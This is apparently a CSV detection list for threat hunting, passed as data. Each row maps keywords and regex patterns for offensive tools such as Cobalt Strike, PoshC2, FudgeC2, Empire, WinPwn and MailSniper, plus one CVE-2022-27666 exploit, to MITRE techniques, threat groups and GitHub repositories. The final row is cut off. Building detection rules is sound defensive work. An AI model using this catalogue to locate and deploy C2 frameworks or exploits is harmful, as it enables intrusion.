"*get_newimplanturl*",".{0,1000}get_newimplanturl.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45640"
"*get_obfucation_string_dict*",".{0,1000}get_obfucation_string_dict.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45641"
"*get_password_policy.x64.*",".{0,1000}get_password_policy\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","45642"
"*get_password_policy.x86.*",".{0,1000}get_password_policy\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","45643"
"*get_post_ex_pipename_list*",".{0,1000}get_post_ex_pipename_list.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45644"
"*get_post_ex_spawnto_x*",".{0,1000}get_post_ex_spawnto_x.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45645"
"*get_powershell_implant_stager(*",".{0,1000}get_powershell_implant_stager\(.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45646"
"*get_powershell_obf_strings(*",".{0,1000}get_powershell_obf_strings\(.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","45647"
"*get_process_inject_allocator*",".{0,1000}get_process_inject_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45648"
"*get_process_inject_bof_allocator*",".{0,1000}get_process_inject_bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45649"
"*get_process_inject_execute*",".{0,1000}get_process_inject_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45650"
"*get_rooot.c*",".{0,1000}get_rooot\.c.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","N/A","3","204","39","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z","45651"
"*get_sharpurls*",".{0,1000}get_sharpurls.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45652"
"*get_stage_allocator*",".{0,1000}get_stage_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45653"
"*get_stage_magic_mz_64*",".{0,1000}get_stage_magic_mz_64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45654"
"*get_stage_magic_mz_86*",".{0,1000}get_stage_magic_mz_86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45655"
"*get_stage_magic_pe*",".{0,1000}get_stage_magic_pe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","45656"
"*get_virtual_Hook_address*",".{0,1000}get_virtual_Hook_address.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","45657"
"*Get_WinPwn_Repo.sh*",".{0,1000}Get_WinPwn_Repo\.sh.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","45658"
"*Get-AccessTokenWithPRT*",".{0,1000}Get\-AccessTokenWithPRT.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","45827"
"*Get-AccountPassDontExpire*",".{0,1000}Get\-AccountPassDontExpire.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","45828"
"*Get-AclModificationRights*",".{0,1000}Get\-AclModificationRights.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","45829"
"*Get-ActiveTCPConnections*",".{0,1000}Get\-ActiveTCPConnections.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 